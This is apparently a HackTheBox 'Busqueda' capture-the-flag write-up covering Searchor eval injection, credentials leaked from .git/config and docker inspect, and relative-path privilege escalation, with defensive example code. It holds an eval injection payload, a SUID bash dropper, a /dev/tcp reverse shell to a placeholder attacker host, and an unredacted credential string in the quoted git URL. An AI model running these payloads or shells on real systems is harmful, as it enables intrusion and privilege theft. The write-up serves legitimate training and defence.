Overview

Field        Detail
Name         Busqueda
OS           Linux
Difficulty   Easy
Platform     HackTheBox
Topics       CVE-2023-43364, Searchor 2.4.0, Python eval()

Attack Path

flowchart TD
    A([Attacker]) -->|CVE-2023-43364 RCE| B[Shell as svc]
    B -->|.git/config credential leak| C[cody:passxxx]
    C -->|nxc ssh credential check| D[SSH as svc]
    D -->|sudo -l| E[system-checkup.py as root]
    E -->|docker inspect gitea| F[administrator credentials]
    F -->|Gitea source code review| G[Path Injection via ./full-checkup.sh]
    G -->|SUID bash or reverse shell| H([Root Shell])
    style A fill:#e74c3c,color:#fff
    style H fill:#2ecc71,color:#fff
    style G fill:#e67e22,color:#fff

1. Services Scan

A standard Nmap service scan reveals two open ports: 22 (SSH) and 80 (HTTP).

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://searcher.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS

Note: The redirect to searcher.htb in the Nmap output reveals the virtual hostname. Add it to /etc/hosts.

echo "TARGET_IP searcher.htb" | sudo tee -a /etc/hosts

2. Attacking HTTP (Port 80)

Scope: *.searcher.htb

The page footer discloses two key technologies:

  • Flask (Python web framework)
  • Searchor 2.4.0

Searching for "Searchor 2.4.0 CVE" immediately surfaces CVE-2023-43364, a remote code execution vulnerability: Searchor's search command builds a Python expression out of the caller-supplied engine and query strings and hands it to eval() without any sanitization, so a query that closes the single-quoted string literal can append arbitrary Python.

sequenceDiagram
    participant A as Attacker
    participant S as Searcher App (Flask)
    participant E as Python eval()
    A->>S: POST /search  engine=Google&query='),__import__('os').system('...')#
    S->>E: eval(f"Engine.{engine}.search('{query}', ...)")
    E-->>A: OS command executed → Reverse Shell
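The bug class next to its fix, as an added example (not Searchor's or the box's code). The f-string shape, with engine and query interpolated into Python source and passed to eval(), follows the description above; the Engine class, the sink() stand-in for os.system() and the function names are assumptions made for the example.

```python
"""Vulnerable eval()-based search dispatch next to a hardened rewrite.

Added example for this writeup, not Searchor's or the box's code. The
f-string shape (engine and query interpolated into Python source and
passed to eval) follows the page's description of CVE-2023-43364; the
class and function names here are assumptions.
"""
from urllib.parse import quote_plus


class Engine:
    """Stand-in for Searchor's Engine enum: each member builds a search URL."""

    @staticmethod
    def google(query: str) -> str:
        return "https://www.google.com/search?q=" + quote_plus(query)

    @staticmethod
    def bing(query: str) -> str:
        return "https://www.bing.com/search?q=" + quote_plus(query)


# Stand-in for os.system(): records what an injected payload executed, so the
# example proves code ran without touching the host.
EXECUTED = []


def sink(cmd: str) -> int:
    EXECUTED.append(cmd)
    return 0


def vulnerable_search(engine: str, query: str):
    """The bug class: user text becomes Python source and is evaluated."""
    return eval(f"Engine.{engine}('{query}')")  # deliberately unsafe


# Same payload shape as the public PoCs: close the string literal, append an
# expression, comment out the rest of the template.
PAYLOAD = "'),sink('id')#"

ALLOWED_ENGINES = {"google": Engine.google, "bing": Engine.bing}


def safe_search(engine: str, query: str) -> str:
    """Hardened: allow-listed dispatch; the query is only ever a string value."""
    try:
        handler = ALLOWED_ENGINES[engine]
    except KeyError:
        raise ValueError(f"unknown engine: {engine!r}") from None
    return handler(query)


if __name__ == "__main__":
    print(vulnerable_search("google", "busqueda"))
    print(vulnerable_search("google", PAYLOAD), "-> executed:", EXECUTED)
    print(safe_search("google", PAYLOAD))
```

With the payload, the vulnerable version evaluates `Engine.google(''),sink('id')` (a tuple) and the injected call runs; the hardened version never parses the query as code, it only URL-encodes it, and an engine name that is not in the allow-list is rejected before anything is evaluated.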

3. Foothold — Shell as svc

Using a public PoC for CVE-2023-43364, a reverse shell is obtained as the svc user.

# Public PoC usage (example)
python3 poc.py http://searcher.htb ATTACKER_IP ATTACKER_PORT

Once connected, stabilize the shell immediately:

# Upgrade to a fully interactive TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Background with Ctrl+Z, then:
stty raw -echo; fg
export TERM=xterm

4. Credential Hunting — .git/config

Inspecting the web application directory reveals a Git repository with a telling config file:

cat /var/www/app/.git/config
[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
[remote "origin"]
    url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
    fetch = +refs/heads/*:refs/remotes/origin/*

Findings:

  • New subdomain: gitea.searcher.htb
  • Credentials in URL: cody:passxxx

Add the new subdomain to /etc/hosts:

echo "TARGET_IP gitea.searcher.htb" | sudo tee -a /etc/hosts

5. Credential Validation

Verify the credentials work for SSH using netexec:

nxc ssh searcher.htb -u svc -p 'passxxx'

✅ Valid — the svc account reuses cody’s password.


6. Privilege Escalation — Abusing sudo

Sudo Enumeration

sudo -l
User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

The script accepts subcommands: docker-ps, docker-inspect, and full-checkup.

Step 1 — Extract Credentials via docker inspect

The target host runs a Gitea Docker container. The docker-inspect subcommand passes the caller-supplied format string straight through to docker inspect --format, so a format of '{{json .}}' dumps the container's entire configuration, including environment variables with hardcoded credentials:

sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' gitea

Parse the JSON output for password-like entries under Config.Env, then log into gitea.searcher.htb as administrator with the recovered password.
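Both credential-hunting steps on this box, the remote URL in .git/config from section 4 and the docker inspect JSON from this step, come down to the same two checks: userinfo embedded in a URL, and environment entries whose key looks like a secret. The following is an added example, not part of the writeup. GIT_CONFIG is the config quoted in section 4; DOCKER_INSPECT is constructed to mirror the shape of `docker inspect '{{json .}}'` output with made-up values, not the box's real container configuration.

```python
"""Credential hunting over .git/config remote URLs and docker inspect JSON.

Added example, not part of the writeup. GIT_CONFIG is the config quoted
earlier on the page; DOCKER_INSPECT is constructed to mirror the shape of
real `docker inspect '{{json .}}'` output, with made-up values, not the
box's actual container configuration.
"""
import json
import re
from urllib.parse import urlsplit

GIT_CONFIG = """\
[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
[remote "origin"]
    url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
    fetch = +refs/heads/*:refs/remotes/origin/*
"""

# Constructed sample: key names follow Gitea's GITEA__section__KEY convention,
# values are invented for the example.
DOCKER_INSPECT = json.dumps({
    "Name": "/gitea",
    "Config": {
        "Image": "gitea/gitea:latest",
        "Env": [
            "USER_UID=1000",
            "USER_GID=1000",
            "GITEA__database__DB_TYPE=mysql",
            "GITEA__database__HOST=db:3306",
            "GITEA__database__NAME=gitea",
            "GITEA__database__USER=gitea",
            "GITEA__database__PASSWD=example-db-password",
            "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
        ],
    },
})

SECTION = re.compile(r"^\s*\[(.+?)\]\s*$")
URL_LINE = re.compile(r"^\s*url\s*=\s*(\S+)\s*$")
SECRET_KEY = re.compile(r"pass|pwd|secret|token|api_?key", re.I)


def creds_from_git_config(text: str):
    """Return (remote, host, user, password) for every remote URL carrying userinfo."""
    found, section = [], None
    for line in text.splitlines():
        m = SECTION.match(line)
        if m:
            section = m.group(1)
            continue
        m = URL_LINE.match(line)
        if not (m and section and section.startswith("remote ")):
            continue
        parts = urlsplit(m.group(1))
        if parts.username:
            remote = section.split(" ", 1)[1].strip('"')
            found.append((remote, parts.hostname, parts.username, parts.password))
    return found


def secrets_from_docker_inspect(text: str):
    """Return (container, key, value) for Config.Env entries whose key looks secret."""
    data = json.loads(text)
    containers = data if isinstance(data, list) else [data]  # plain inspect vs {{json .}}
    hits = []
    for c in containers:
        name = c.get("Name", "?").lstrip("/")
        for entry in c.get("Config", {}).get("Env", []):
            key, sep, value = entry.partition("=")
            if sep and SECRET_KEY.search(key):
                hits.append((name, key, value))
    return hits


if __name__ == "__main__":
    for hit in creds_from_git_config(GIT_CONFIG) + secrets_from_docker_inspect(DOCKER_INSPECT):
        print(hit)
```

The docker parser accepts both the single object that '{{json .}}' returns and the array that a bare docker inspect returns, so the same function works on output saved from either form.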

Step 2 — Source Code Review

flowchart LR
    SC[system-checkup.py\nsource on Gitea] -->|Reads| FC["full-checkup handler\n./full-checkup.sh"]
    FC -->|Relative path!| PI[Path Injection]
    PI --> PE[Privilege Escalation]

The Gitea repository (accessible as administrator) contains the source of system-checkup.py. The critical flaw:

# Vulnerable snippet inside system-checkup.py
elif action == 'full-checkup':
    os.system('./full-checkup.sh')   # ← relative path, not absolute

Because the script runs as root via sudo and invokes ./full-checkup.sh by a relative path, the path is resolved against the current working directory of the sudo invocation. sudo does not change directory, so the script inherits whatever directory svc ran the command from, and any full-checkup.sh placed in that directory is executed as root.
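The flaw reproduced and then fixed, as an added example (not the box's system-checkup.py). It plants two copies of full-checkup.sh in a temporary tree constructed here, a trusted one standing in for /opt/scripts and an attacker's one standing in for /tmp, runs the relative-path version from the attacker's directory, and then runs a hardened version that anchors the path to the script's own directory and refuses a helper that is not owned by the trusted uid or is group/world-writable. The scripts are invoked through /bin/sh rather than executed directly so the example also runs where the temporary filesystem is mounted noexec; the path-resolution behaviour under test is the same.

```python
"""The relative-path flaw in a privileged helper, reproduced and hardened.

Added example, not the box's system-checkup.py. Two copies of
full-checkup.sh are planted in a temporary tree constructed here: a
"trusted" one in a stand-in for /opt/scripts and an attacker one in a
stand-in for /tmp. Scripts are run via /bin/sh instead of being executed
directly so the example works on a noexec temp filesystem.
"""
import os
import stat
import subprocess
import tempfile


def run_checkup_vulnerable(cwd: str) -> str:
    """Mirrors the bug: './full-checkup.sh' resolves against the caller's cwd."""
    proc = subprocess.run(["/bin/sh", "./full-checkup.sh"], cwd=cwd,
                          capture_output=True, text=True)
    return proc.stdout.strip()


def run_checkup_hardened(script_dir: str, cwd: str, trusted_uid: int = 0) -> str:
    """Fixed: absolute path anchored to the script's own directory, and the
    helper must be owned by the trusted uid and not group/world writable."""
    path = os.path.join(os.path.realpath(script_dir), "full-checkup.sh")
    st = os.stat(path)  # raises FileNotFoundError instead of falling back to cwd
    if st.st_uid != trusted_uid:
        raise PermissionError(f"{path} is not owned by uid {trusted_uid}")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise PermissionError(f"{path} is group- or world-writable")
    proc = subprocess.run(["/bin/sh", path], cwd=cwd, capture_output=True,
                          text=True, check=True)
    return proc.stdout.strip()


def _write_script(path: str, body: str, mode: int) -> None:
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\n" + body + "\n")
    os.chmod(path, mode)


def demo() -> dict:
    """Run both variants with the attacker-controlled directory as cwd."""
    with tempfile.TemporaryDirectory() as root:
        trusted = os.path.join(root, "opt_scripts")  # stand-in for /opt/scripts
        attacker = os.path.join(root, "tmp")         # stand-in for /tmp
        os.makedirs(trusted)
        os.makedirs(attacker)
        _write_script(os.path.join(trusted, "full-checkup.sh"),
                      "echo legitimate-checkup", 0o755)
        _write_script(os.path.join(attacker, "full-checkup.sh"),
                      "echo pwned-from-cwd", 0o755)
        me = os.getuid()  # on the real box the trusted owner would be root (0)
        results = {
            "vulnerable": run_checkup_vulnerable(attacker),
            "hardened": run_checkup_hardened(trusted, cwd=attacker, trusted_uid=me),
        }
        # A writable helper is refused even when it sits at the right path.
        os.chmod(os.path.join(trusted, "full-checkup.sh"), 0o777)
        try:
            run_checkup_hardened(trusted, cwd=attacker, trusted_uid=me)
            results["hardened_world_writable"] = "ran"
        except PermissionError:
            results["hardened_world_writable"] = "refused"
        return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The ownership and mode checks matter as much as the absolute path: a root-owned script that calls a world-writable helper by absolute path is the same bug with one extra step.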


7. Exploitation — Two Paths to Root

Method 1 — SUID bash

Create a malicious full-checkup.sh in a writable directory:

cd /tmp
cat > full-checkup.sh << 'EOF'
#!/bin/bash

cp /bin/bash /tmp/bash
chown root:root /tmp/bash
chmod 4755 /tmp/bash
EOF
chmod +x full-checkup.sh

Run the privileged script from /tmp:

sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

Use the SUID bash to get a root shell (-p tells bash to keep the effective UID instead of dropping it):

/tmp/bash -p
whoami   # root

Method 2 — Reverse Shell as root

Create a reverse shell payload (use revshells.com to generate):

cd /tmp
cat > full-checkup.sh << 'EOF'
#!/bin/bash

/bin/bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
EOF
chmod +x full-checkup.sh

Set up your listener:

nc -lvnp PORT

Then trigger execution:

sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

💥 Root shell received on the listener.


Attack Chain Summary

flowchart LR
    subgraph Foothold
        A[CVE-2023-43364\nSearchor eval RCE] --> B[Shell: svc]
    end
    subgraph Lateral Movement
        B --> C[.git/config\nCredential Leak]
        C --> D[nxc SSH\nValidation]
    end
    subgraph Escalation
        D --> E[sudo system-checkup.py\ndocker inspect]
        E --> F[Administrator on Gitea]
        F --> G[Source Code Review\nRelative Path Bug]
        G --> H[Path Injection\nfull-checkup.sh]
        H --> I[Root Shell]
    end
    style A fill:#c0392b,color:#fff
    style I fill:#27ae60,color:#fff

Stage              Technique                          Result
Initial Access     CVE-2023-43364 (eval injection)    Shell as svc
Cred Discovery     .git/config plaintext password     cody:passxxx
Lateral Movement   SSH credential reuse               Confirmed svc access
Privesc Recon      docker inspect via sudo script     administrator on Gitea
Privesc            Path injection ./full-checkup.sh   Root shell

Key Takeaways

  • Always inspect .git/ directories in web app roots — they frequently contain credentials in remote URLs.
  • Relative paths in privileged scripts (./script.sh vs /absolute/path/script.sh) are a critical misconfiguration and a classic LPE vector.
  • docker inspect is an underrated secret-disclosure vector when docker CLI access (direct, or indirect through a sudo wrapper as here) is available: container environment variables routinely carry database and admin passwords.
  • CVE-2023-43364 serves as a reminder that eval() on user input is never safe, regardless of language.